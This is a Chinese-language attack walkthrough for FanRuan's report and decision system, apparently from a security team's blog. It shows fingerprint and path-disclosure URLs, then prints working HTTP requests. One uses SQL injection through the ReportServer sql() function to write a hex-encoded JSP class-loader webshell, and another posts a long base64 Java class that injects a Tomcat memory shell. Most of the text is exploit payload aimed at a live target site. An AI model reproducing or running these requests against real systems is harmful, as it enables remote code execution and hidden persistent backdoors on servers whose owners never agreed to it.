前言

这里拿到目标站，结合漏扫指纹库可以发现是帆软数据决策系统，需要各位师傅收集系统指纹路径

登录页面

这里可以通过该路径查看当前版本,个别情况根目录可能没有webroot

/webroot/dicision/system/info

/dicision/system/info

根据版本信息发现可以用之前爆出的sql注入nday，这里是相关链接

https://github.com/Sec-Fork/POC-20240918/blob/main/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8/%E5%B8%86%E8%BD%AF%E7%B3%BB%E7%BB%9FReportServer%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%AF%BC%E8%87%B4RCE.md

可以使用该路由查询当前系统绝对路径

POST /webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}

POST /decision/view/ReportServer?test=s&n=${ENV_HOME}

得到路径打入poc，改一下数据库名和shell名称，这里上传一个jsp手动注入内存马，可以用我们官网https://redcellsec.cn/里的工具,网络厨师:https://cyberchef.redcellsec.cn/,HEX解码看一下内容：

POST /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('ATTACH%09DATABASE%20%27%2Fopt%2Fapache-tomcat-9.0.104%2Fwebapps%2Fwebroot%2FWEB-INF%2F..%2Fhelp%2Fshell2.jsp%27%20as%20xxxx%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('CREATE%09TABLE%20xxxx.exp%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('INSERT%09INTO%20xxxx.exp%28data%29%20VALUES%20%28x%273c25436c6173732073616665203d20436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522293b6a6176612e6c616e672e7265666c6563742e4669656c642073616665436f6e203d20736166652e6765744465636c617265644669656c642822746865556e22202b20227361666522293b73616665436f6e2e73657441636365737369626c652874727565293b73756e2e6d6973632e556e7361666520756e53616665203d202873756e2e6d6973632e556e73616665292073616665436f6e2e676574286e756c6c293b627974655b5d20646174614279746573203d206a617661782e786d6c2e62696e642e4461746174797065436f6e7665727465722e706172736542617365363442696e61727928726571756573742e676574506172616d657465722822646174612229293b756e536166652e646566696e65416e6f6e796d6f7573436c617373286a6176612e696f2e46696c652e636c6173732c206461746142797465732c206e756c6c292e6e6577496e7374616e636528293b253e%27%29%3B'),1,1)} HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=056061503439A51FCF343B787402E1D3
Upgrade-Insecure-Requests: 1
Priority: u=0, i

这里利用我们的落地文件注入内存马，可以使用一下官网的memshell生成内存马：https://memshell.redcellsec.cn/，记得base64+url编码，稳稳的

POST /webroot/help/shell2.jsp HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 15699
Connection: close

data=yv66vgAAADQBbQEAI2NvbS9nb29nbGUvZ3NvL2VaYlB1L1NpZ25hdHVyZVV0aWxzBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABjxpbml0PgEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HAAcMAAUABgoABAAJAQAKZ2V0Q29udGV4dAEAEigpTGphdmEvdXRpbC9MaXN0OwwACwAMCgACAA0BAA5qYXZhL3V0aWwvTGlzdAcADwEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwAEQASCwAQABMBABJqYXZhL3V0aWwvSXRlcmF0b3IHABUBAAdoYXNOZXh0AQADKClaDAAXABgLABYAGQEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAGwAcCwAWAB0BAAhnZXRTaGVsbAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAAfACAKAAIAIQEABmluamVjdAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgwAIwAkCgACACUBAA9wcmludFN0YWNrVHJhY2UMACcABgoACAAoAQAIbGlzdGVuZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBABBMamF2YS91dGlsL0xpc3Q7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEABHRoaXMBACVMY29tL2dvb2dsZS9nc28vZVpiUHUvU2lnbmF0dXJlVXRpbHM7AQAMZ2V0Q2xhc3NOYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBADBvcmcuYXBhY2hlLmh0dHAud2ViLmhhbmRsZXJzLkxHY0lwLk9BdXRoTGlzdGVuZXIIADYBAA9nZXRCYXNlNjRTdHJpbmcBDZhINHNJQUFBQUFBQUEvNVZYQjJBVDF4bituaVg1WkZsbUNHSXdwR0hqSVJteGgyMG9tR2tpaTRBWU1TWWhaK2xzQzRTa1NDZURLZDFOUzJmU2thYnBTTlBRMUczU0FhU1ZJUlJDUzFOb3V2ZmVJMjI2VjBwYUV2ZDdkeWZabG1VZ0ROMjk5Lzc5Zi8vL3YzdnFoY2ZQQVZnc1NnVG1KMUpkZmpXcGhyczFmN2V1Si8wSHRRNS90eHFQeExSVTJoL1lHRzVKK3Jlc3llamRnV2hhMStKYVNvRVF1R0dmMnFQNlkycTh5NzgycHFiVGdZUWFrVWMyZ2RueTZKQS9yYVY2WXBydUQ1blBiZHFkR1MydER3cHhDTmlUNUJUd0JBYUZoZlJVTk43VktEQnUvb3JsblVzN3dwSEZTeGN1aUN4YXRzaUpNZ0ZYdHliMUJOVURHaGM3cUtOK1RaY1cxNTF3QzVTYmh6dlZXSWFuZHAzcW5CZ3JVTm9ValVmMVZRSzJtdHFkYm95SHh3VTdKa2lTN2lqMUx3eTgyQkRRdmlrMWdhSWhhRFJWVEpJcUpndUl3d0tUUnFFVXFPalM5QTFSTFJheGJGNCtWT2lXam4xYVdHOGNHWnpha1VRQ0V3YjMxaDhLYTBrOW1vZ3J1RW5ncHNHRFlDS1VDWGNiQ29mUVRHZXdDd1VxbUNuZ3BIV0d2WlJlVTF2b1JLTWJzekhIaFZtWVN4Y0hEMU5hWjR3Uy9JWWFCVFVDWXdzNEZkUlJKWVd2MDhJeE5hVkZERktCK3Bxcit6cE1NdFg3VU8rQ0YvUE1PSVl5U1MwVmx2TGRtQzhOODJJQmNWcE1wcEdoUlM3TVlBV2dJcTNwYThKaExaMk9kc1FrYm1wMlM0S2xXT1pDTFpZVE5SUXVNTGRJYW9va3dvMEdORXJHSmtycVVWTkxCS1lIcnA0QkpzK1c2TmczdkE3eWViWEhEYXc3T3MwWVZZMGFEOUxRKzhQRTI4VENWRFhWcmVMeCtCRVpGSEIzcUdsdDZXSW1JaEdobHNwaTBXcHZ0Z0F5TDZOSFkvT2FEUTRuTmdzb25RbXJGT2RjSTNVNXhBVFFLaE1UWlBHYSthZmFsQk8zMFBuMkVlUUt0Z21Va2E1VjA3c1RkSDUxRVMwajJZcEJ4cFJBQTdaamh6UmdKeUhkUGpMY0NtNFZtRHdhdTRMZGJDYlJlRTlpUDExZVVRUVFSVVFXeGNnZTNPWkNPMjZudUlnUkF5ZnVHRmFGcG5NS09nUksycHNWMFBuS2RDWSs3MEEwSFo3WHZDYTBQcGN6QnErVG5TK3VIV3lKcDNVMUhxWmxFMnVLS3UxR1ZMcE9vTGxOcGMyWnprNHBJTVpNbWpzcEdtUWl3a1R2VWhaUW9FaGpJWEpLT3RnV0hEMW0zeEpkc3RMYW0wZW1uT0VzdG04aXNqeWlkVWJqbXRWakpwR3dwYVVZYWc3aWtHeW52ZFFhWmtUR3BjeFpzbzcvVTRsZUxaS3Z6dEdtenZvZXpnaldQYk9lSG5rZ01PczZ1QWxSUzI4THAwbFVqVVVQUzgwenJzbXA0TlVzUHRtaGhwMnhNVmg1R28yYm5yOFdyM1BoTmJpTEZUYWMwaGhUbS9nem5FWEJHOXdvaDdNTUpYaWpXVHliaktGWTBNQ0tsS2kxNWNhYjhaWnlITVZiM1JoakNycWJveUNjaU90cU5NNDBUUjAyK0xyVlZFaXFKdkFhYTNlNzhYYTh3NFV3M2ttOGRrbXIwc2xFUEsxdFNDVU81TjNlV3BpclVYeHBMSXpPU0RwVE9tMitGKzkyMGRMN3pMNFNrczA4RVJlWU9TTENRMlFZTk9TOUgrK1YvcjZQU1RJY2sxM092MGxOZDdlcVNRVWZrQk9oeFJ3WkgzVGhBVHpJYXJHQTRNUkRuQitEVEFiRGg5bk9reG45bXNQOGF2M2hJK2dyeDhQNEtBT2ZzcHgwNGhHaWw4NjF4SFV0RlZkak9lOEZ0bDA3b0ZhZ1hrUkVQNDVQeUloK2t0Nm16VkE1Y1p5Vm5uSGlwQnVLaVl4UFc5ZUwwZU9ySU10K0kwZXNUbngxWkhUYVcxMEVpVVVDdzVDZnd1bHk5T054aG5UTitwQVRuN1h1T1lmODRWUnZVay80MTBhVDNmSXllWTdOeEloTnJnZldqb3IyQWw2NmVoNmZjK0VKZkY1ZzJqQ0NkRklMc3lUREtVMi9XZXNOY2FYZ0MrYTFxTG1YdDB1SkRFNUhONzZJaXhMMGw4d2VOdHFGNHlrWG5zU1h5U1J2bzVLMHhhUk1hK0ZNS3FyMytxbkVJUDBxdmlidCticFp2OXVzK3AyUzYrclJoTi9zM0ZyRVBLTUwzOFMzSklhL3piSXJUcVBndXdhWTFFaUFIYmR3UnVSci8vdjRnUXZmd3cvZDJJUVdtZjhmeTltUTJCQWw0RGdiWkN1WER2OFVQNU1XL2x4Z1RPNk9hTjVwZVVFWmVWTzBycnR1L0JLL2toUG8xMUx3WkRkMFpPVGI3eWlZOWFURzBnWFh0UndRMkZaK2p6L0ltK1l6QXRlTjlkekY2eXExTDdBa01LeDZtNjRIbUhKeWpSM094eDBSenMzS1FvQnhUSGFZY0hGRzgvaXN2czRlNk1hTmVJbU0wci9ad2EvUGN3WC9vVG5VVWJFMlllalRjMTlFYTQxTDNsaUpnR0RtUUllVzJxNGFWMTVQSUJGV1l6dlZWRlN1cmMyS2tLNkc5OU01YTEwNW5LZzNtU04wNWE4RmRMRXNGTzJLcTNvbXBmRjJYY0toemVUQ2hqTFpNZmorWDM1MWxzREZkZm1RZFFYWFk0YXN4M0V0NUhjYWYvL0huVVY4Q2o0ZGRmMlllTUlndWNKZkdSWmdrdnpRd3ZOOGM1dEV1QUdWZkVvQmt5d0JxMGdwYVV2cnZQMm9LcFF3bFR3M0doSXFUU3BMZ255YndsTjZKYlBBTXlucmFicmo0SE81YUszTG9qcFk3NW4xTUNycnZWbjRXL3RRMFdDdnoySmhzRy9nR2Q5RnVNOWdSaHRWTG5uQ1o4OWloWThNSzQ5VFhnVW1VTU1NV3Y0Q0pZMkgvWGtvQ21vVmVJTUtacFM1RGVNVzBpRmdPdFhPWVBSbWttazIyZWFRY1M0ZHJxWkJOVHl0NDY0WDlmeTdFUE1NSnhiVHZNbjh2d292cFFJYWl0VllZN2l6SE0xR2xFdjRkYk1XNi9oVXNBRHJzWkV1RFZnQk5IYzJ5QTk1L3BINW0wYjMyUTNNVUlyOURJcDAveFVpNExuNUZMYTAranhieFhtRXN0amw0N010aTcxQlJxRGFvOXJQd3R0bTg0VGxVVDBYczlwc2RYemZleDRhL3dYNjBCVDBkQmtTc3RqZllLK3lTNjREUTdtcTdNWFlIQTEyNzNFam9hdnB4VFQ2Y1JDSCtUU0RXUXZiQUxkTEZMQmJheEFLcGczUVhidTE1dExZZTQ3dURBWjVNWVV0WTJpV005c3JqSEN0NVhmY09qUmhNMWJpRm9ieUlIY1BNNkJIR0VJWjVFMlVOSlhKaUpQV1JzNUdKQmpHRXRKV0czdDJjczYzOXRaUmJoSjNrbzVoUTRyVUVuOUhrRWFFVmd4WXVETmxiT0NieVNuZmhPeVJGdTVXVXFaRVoxbWQxK1k5MTQvRHgvTXdMaldBdjNFSWhNdnlFQzdEeTZRYUlRenFIbElld2N1dHNsaGk3REdwSndwRUJZYUlFbmxSZ3RhLzBpakZWK1ZFaU1mSVVjYXpTOFQvNjgvamFLdnZKTjUwR204cjRWQThtWDgvaVh1eWVOZjllTERPMTQvM0JIMm44WDZCQnZzWlBOQlcybzhQTlRpcUhKNWozUDJZalVsM2VCNnRJNEkrbFYrZXFMSmI3M2JQWTNXN1R1SXpwM0hHQnMvWlU3alFVRnBWNmppREo5dU0vU3krNURuYmo2OWs4WTJxVXNyN2prQVdQenFGbjJUeGl3YmxERXJhWk1sbThadCsvTFpLeWVKcGlUeG5sYlBLa2NVZmQvWEJIanhCdjV5NFFPdHpnS3FBN1FvdUtEamFMTEZqQkdrek94T3dsWVFoVnRwMjF1TU8rTENUTU5wRnFOektXbW5qNzI3R3ZaM3Azb05lM0laN2NEdU9ZUy9PNEE2S0QxTkJCeTZTUWdaNkQwUG93MzE0Qkg4aVNCYmpiaHpIbjZsK0ZlNGk3UDdLZXV1bHpyL2g3d3oyTWRiOFA4aW5VSklUL3lUVUpKd3U1Wk4weVVxU2s5ZWFoL0F2cGpCWDJhYTB2MUNha0xjN0N3TUpVa2hnanZONkhqMkZaOC9qY3FCdjRObFc3M0VEQ0M2NlA0M25NaEFLS1FNeUJqSUVIcU8xUkVrUUk4ayt0dS85aGl2VFNUeUdoTThSN3hJOTQvS0dqVFBjazgySGwzVUwwL2NhSXdMdzFiVjZneEI5c0xWNlBjZG9SczRXZHRReFFlK1FsYzBuRFhPaGloMDVaMWcxU3ArWEJjNmFQem9ncThSOGxYVisrWXEwKy9KV211MGFCTGlEeHVVQTdpQ0RhYUo4a3hFYjJ2bndmOUZLWTd3cUZRQUEIADkBACYoKUxqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs%2BOwEAE2phdmEvdXRpbC9BcnJheUxpc3QHADwKAD0ACQEAEGphdmEvbGFuZy9UaHJlYWQHAD8BAApnZXRUaHJlYWRzCABBAQAPamF2YS9sYW5nL0NsYXNzBwBDAQAMaW52b2tlTWV0aG9kAQBdKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzO1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABFAEYKAAIARwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAEkBAAdnZXROYW1lDABLADUKAEAATAEAHENvbnRhaW5lckJhY2tncm91bmRQcm9jZXNzb3IIAE4BABBqYXZhL2xhbmcvU3RyaW5nBwBQAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAFIAUwoAUQBUAQAGdGFyZ2V0CABWAQANZ2V0RmllbGRWYWx1ZQEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DABYAFkKAAIAWgEABnRoaXMkMAgAXAEACGNoaWxkcmVuCABeAQARamF2YS91dGlsL0hhc2hNYXAHAGABAAZ2YWx1ZXMBABgoKUxqYXZhL3V0aWwvQ29sbGVjdGlvbjsMAGIAYwoAYQBkAQAUamF2YS91dGlsL0NvbGxlY3Rpb24HAGYLAGcAEwEAA2FkZAEAFShMamF2YS9sYW5nL09iamVjdDspWgwAaQBqCwAQAGsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DABtAG4KAEAAbwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwAcQByCgAEAHMBAAh0b1N0cmluZwwAdQA1CgBEAHYBABlQYXJhbGxlbFdlYmFwcENsYXNzTG9hZGVyCAB4AQAfVG9tY2F0RW1iZWRkZWRXZWJhcHBDbGFzc0xvYWRlcggAegEACXJlc291cmNlcwgAfAgALAEAF0xqYXZhL3V0aWwvSGFzaE1hcDwqKj47AQATTGphdmEvdXRpbC9IYXNoTWFwOwEABXZhbHVlAQALY2hpbGRyZW5NYXABAAZ0aHJlYWQBABJMamF2YS9sYW5nL1RocmVhZDsBAAd0aHJlYWRzAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DACGAIcKAEAAiAEADmdldENsYXNzTG9hZGVyDACKAG4KAEQAiwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAjQwANAA1CgACAI8BAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7DACRAJIKAI4AkwEAC25ld0luc3RhbmNlDACVABwKAEQAlgwAOAA1CgACAJgBAAxkZWNvZGVCYXNlNjQBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCDACaAJsKAAIAnAEADmd6aXBEZWNvbXByZXNzAQAGKFtCKVtCDACeAJ8KAAIAoAEAC2RlZmluZUNsYXNzCACiAQACW0IHAKQBABFqYXZhL2xhbmcvSW50ZWdlcgcApgEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAqACpCQCnAKoBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAKwArQoARACuAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwCwAQANc2V0QWNjZXNzaWJsZQEABChaKVYMALIAswoAsQC0AQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMALYAtwoApwC4AQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAC6ALsKALEAvAEACWNsYXp6Qnl0ZQEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAFY2xhenoBABRMamF2YS9sYW5nL0NsYXNzPCo%2BOwEAC2NsYXNzTG9hZGVyAQAXTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAppc0luamVjdGVkDADEAGoKAAIAxQEAIGFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnNPYmplY3RzCADHAQATW0xqYXZhL2xhbmcvT2JqZWN0OwcAyQEAEGphdmEvdXRpbC9BcnJheXMHAMsBAAZhc0xpc3QBACUoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS91dGlsL0xpc3Q7DADNAM4KAMwAzwEAGShMamF2YS91dGlsL0NvbGxlY3Rpb247KVYMAAUA0QoAPQDSAQAHdG9BcnJheQEAFSgpW0xqYXZhL2xhbmcvT2JqZWN0OwwA1ADVCwAQANYBAA1zZXRGaWVsZFZhbHVlAQA5KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWDADYANkKAAIA2gEAHWFwcGxpY2F0aW9uRXZlbnRMaXN0ZW5lcnNMaXN0CADcAQAPYXBwTGlzdGVuZXJMaXN0AQAMYXBwTGlzdGVuZXJzAQAcZ2V0QXBwbGljYXRpb25FdmVudExpc3RlbmVycwgA4AoAPQATCgBEAEwBAAFvAQAHb2JqZWN0cwEACWxpc3RlbmVycwEACWFycmF5TGlzdAEAFUxqYXZhL3V0aWwvQXJyYXlMaXN0OwEAEGphdmEudXRpbC5CYXNlNjQIAOkBAAdmb3JOYW1lDADrAJIKAEQA7AEACmdldERlY29kZXIIAO4BAAlnZXRNZXRob2QMAPAArQoARADxAQAGZGVjb2RlCADzAQAWc3VuLm1pc2MuQkFTRTY0RGVjb2RlcggA9QEADGRlY29kZUJ1ZmZlcggA9wEAB2RlY29kZXIBAAxkZWNvZGVyQ2xhc3MBAAdpZ25vcmVkAQAJYmFzZTY0U3RyAQASTGphdmEvbGFuZy9TdHJpbmc7AQATamF2YS9pby9JT0V4Y2VwdGlvbgcA%2FgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwEACgEBAAkBAB1qYXZhL3V0aWwvemlwL0daSVBJbnB1dFN0cmVhbQcBAwEAHGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW0HAQUBAAUoW0IpVgwABQEHCgEGAQgBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMAAUBCgoBBAELAQAEcmVhZAEABShbQilJDAENAQ4KAQQBDwEABXdyaXRlAQAHKFtCSUkpVgwBEQESCgEBARMBAAt0b0J5dGVBcnJheQEABCgpW0IMARUBFgoBAQEXAQAFY2xvc2UMARkABgoBBAEaCgEBARoBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwEdAQAGYnVmZmVyAQABbgEAAUkBAA5jb21wcmVzc2VkRGF0YQEAA291dAEAH0xqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAA9nemlwSW5wdXRTdHJlYW0BAB9MamF2YS91dGlsL3ppcC9HWklQSW5wdXRTdHJlYW07AQAIZ2V0RmllbGQBAD8oTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HASkBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcBKwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsMAS0BLgoARAEvAQANZ2V0U3VwZXJjbGFzcwwBMQByCgBEATIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAAUBNAoBKgE1AQADb2JqAQAEbmFtZQwBJwEoCgACATkBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBOwoBPAC0AQADZ2V0DAE%2BACAKATwBPwEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAA3NldAwBQwAkCgE8AUQBAAlmaWVsZE5hbWUBAGAoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M8Kj47W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwFIAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIHAUoKAUsACQEAEk1ldGhvZCBub3QgZm91bmQ6IAgBTQEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwwBTwFQCgFLAVEKAUsAdgoBSQE1AQASW0xqYXZhL2xhbmcvQ2xhc3M7BwFVAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24HAVcBABdFcnJvciBpbnZva2luZyBtZXRob2Q6IAgBWQEAKihMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1Rocm93YWJsZTspVgwABQFbCgFYAVwBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAAZtZXRob2QBAAptZXRob2ROYW1lAQAKcGFyYW1DbGF6egEAFVtMamF2YS9sYW5nL0NsYXNzPCo%2BOwEABXBhcmFtAQAIPGNsaW5pdD4KAAIACQEABENvZGUBAA1TdGFja01hcFRhYmxlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEACkV4Y2VwdGlvbnMBAAlTaWduYXR1cmUAIQACAAQAAAAAAA4AAQAFAAYAAQFmAAAA6gADAAUAAAA6KrcACiq2AA5MK7kAFAEATSy5ABoBAJkAGyy5AB4BAE4qLbcAIjoEKi0ZBLYAJqf%2F4qcACEwrtgApsQABAAQAMQA0AAgABAFnAAAAGgAE%2FwAQAAMHAAIHABAHABYAAPkAIEIHAAgEAWgAAAAqAAoAAAAcAAQAHgAJAB8AIAAgACcAIQAuACIAMQAlADQAIwA1ACQAOQAmAWkAAAA0AAUAJwAHACoAKwAEACAADgAsACsAAwAJACgALQAvAAEANQAEADAAMQABAAAAOgAyADMAAAFqAAAADAABAAkAKAAtAC4AAQABADQANQABAWYAAAAPAAEAAQAAAAMSN7AAAAAAAAEAOAA1AAEBZgAAAA8AAQABAAAAAxI6sAAAAAAAAQALAAwAAwFmAAACGAAEAA0AAAD%2FuwA9WbcAPkwSQBJCA70ARAO9AAS4AEjAAErAAEpNLE4tvjYEAzYFFQUVBKIA0i0VBTI6BhkGtgBNEk%2B2AFWZAHUZBhJXuABbEl24AFsSX7gAW8AAYToHGQe2AGW5AGgBADoIGQi5ABoBAJkARhkIuQAeAQA6CRkJEl%2B4AFvAAGE6ChkKtgBluQBoAQA6CxkLuQAaAQCZABgZC7kAHgEAOgwrGQy5AGwCAFen%2F%2BSn%2F7anAEcZBrYAcMYAPxkGtgBwtgB0tgB3Enm2AFWaABYZBrYAcLYAdLYAdxJ7tgBVmQAZKxkGtgBwEn24AFsSfrgAW7kAbAIAV4QFAaf%2FLSuwAAAABAFnAAAAPQAJ%2FwAnAAYHAAIHABAHAEoHAEoBAQAA%2FgA7BwBABwBhBwAW%2FgAqBwAEBwBhBwAW%2BAAe%2BQACAi36ABX4AAUBaAAAAEYAEQAAADEACAAyAB4AMwA0ADQAQQA1AFcANgB2ADcAggA4AKEAOQCqADoArQA7ALAAPAC9AD0A0AA%2BAOEAPwD3ADMA%2FQBCAWkAAABSAAgAoQAJACwAKwAMAIIAKwBeAIAACgB2ADcAgQArAAkAVwBZAIIAgAAHADQAwwCDAIQABgAAAP8AMgAzAAAACAD3AC0ALwABAB4A4QCFAEkAAgFqAAAAIAADAIIAKwBeAH8ACgBXAFkAggB%2FAAcACAD3AC0ALgABAWsAAAAEAAEACAFsAAAAAgA7AAIAHwAgAAIBZgAAATAABgAHAAAAergAibYAcE0sxwALK7YAdLYAjE0sKrYAkLYAlLYAl7BOKrYAmbgAnbgAoToEEo4Sowa9AERZAxKlU1kEsgCrU1kFsgCrU7YArzoFGQUEtgC1GQUsBr0ABFkDGQRTWQQDuAC5U1kFGQS%2BuAC5U7YAvcAARDoGGQa2AJewAAEAEwAeAB8ACAAEAWcAAAAMAAL8ABMHAI5LBwAIAWgAAAAqAAoAAABHAAcASAALAEkAEwBMAB8ATQAgAE4ALABPAEoAUABQAFEAdABSAWkAAABIAAcALABOAL4ApAAEAEoAMACiAL8ABQB0AAYAwACpAAYAIABaADAAMQADAAAAegAyADMAAAAAAHoALAArAAEABwBzAMIAwwACAWoAAAAMAAEAdAAGAMAAwQAGAWsAAAAEAAEACAABACMAJAACAWYAAAEpAAMABgAAAGwqK7YAxpkABLErEsi4AFtOLcYAOC3AAMrAAMo6BBkExgAnuwA9WRkEuADQtwDTOgUZBSy5AGwCAFcrEsgZBbkA1wEAuADbpwAlKxLduABbxgAcKxLduABbwAAQOgQZBMYADBkELLkAbAIAV7EAAAAEAWcAAAALAAQJ%2FAA8BwAEAiEBaAAAADoADgAAAFgACABZAAkAWwAQAFwAFABdAB0AXgAiAF8AMABgADkAYQBGAGMAUgBkAF0AZQBiAGYAawBpAWkAAABIAAcAMAAWAN4ALwAFAB0AKQDfAMkABABdAA4A3wAvAAQAAABsADIAMwAAAAAAbAAsACsAAQAAAGwAKgArAAIAEABcAMcAKwADAWoAAAAMAAEAXQAOAN8ALgAEAWsAAAAEAAEACAABAMQAagACAWYAAADuAAQABwAAAFErEuEBAbgASMAAysAAyk0suADQTrsAPVkttwDTOgQZBLYA4joFGQW5ABoBAJkAIxkFuQAeAQA6BhkGtgB0tgDjKrYAkLYAVZkABQSsp%2F%2FZA6wAAAADAWcAAAAfAAP%2FACUABgcAAgcABAcAygcAEAcAPQcAFgAAJvoAAgFoAAAAIgAIAAAAbQAPAG4AFABvAB4AcAA4AHEASgByAEwAdABPAHUBaQAAAD4ABgA4ABQA5AArAAYAAABRADIAMwAAAAAAUQAsACsAAQAPAEIA5QDJAAIAFAA9AOYALwADAB4AMwDnAOgABAFrAAAABAABAAgACQCaAJsAAgFmAAABAAAGAAMAAABqEuq4AO1MKxLvA70ARLYA8gEDvQAEtgC9TSy2AHQS9AS9AERZAxJRU7YA8iwEvQAEWQMqU7YAvcAApcAApbBNEva4AO1MKxL4BL0ARFkDElFTtgDyK7YAlwS9AARZAypTtgC9wAClwAClsAABAAAAPQA%2BAAgABAFnAAAABgABfgcACAFoAAAAGgAGAAAAfQAGAH4AGQB%2FAD4AgAA%2FAIEARQCCAWkAAAA0AAUAGQAlAPkAKwACAAYAOAD6AKkAAQA%2FACsA%2BwAxAAIAAABqAPwA%2FQAAAEUAJQD6AKkAAQFqAAAAFgACAAYAOAD6AMEAAQBFACUA%2BgDBAAEBawAAAAQAAQAIAAkAngCfAAIBZgAAAT0ABQAHAAAAXLsBAVm3AQJMAU27AQRZuwEGWSq3AQm3AQxNERAAvAhOLC22ARBZNgSeAA4rLQMVBLYBFKf%2F7Su2ARg6BSzGAAcstgEbK7YBHBkFsDoGLMYAByy2ARsrtgEcGQa%2FAAIACgA8AEsAAABLAE0ASwAAAAMBZwAAAEEABf4AIAcBAQcBBAcApfwAFQH8AA0HAKX%2FAAYAAwcApQcBAQcBBAABBwEe%2FwAJAAcHAKUHAQEHAQQAAAAHAR4AAAFoAAAAPgAPAAAAiAAI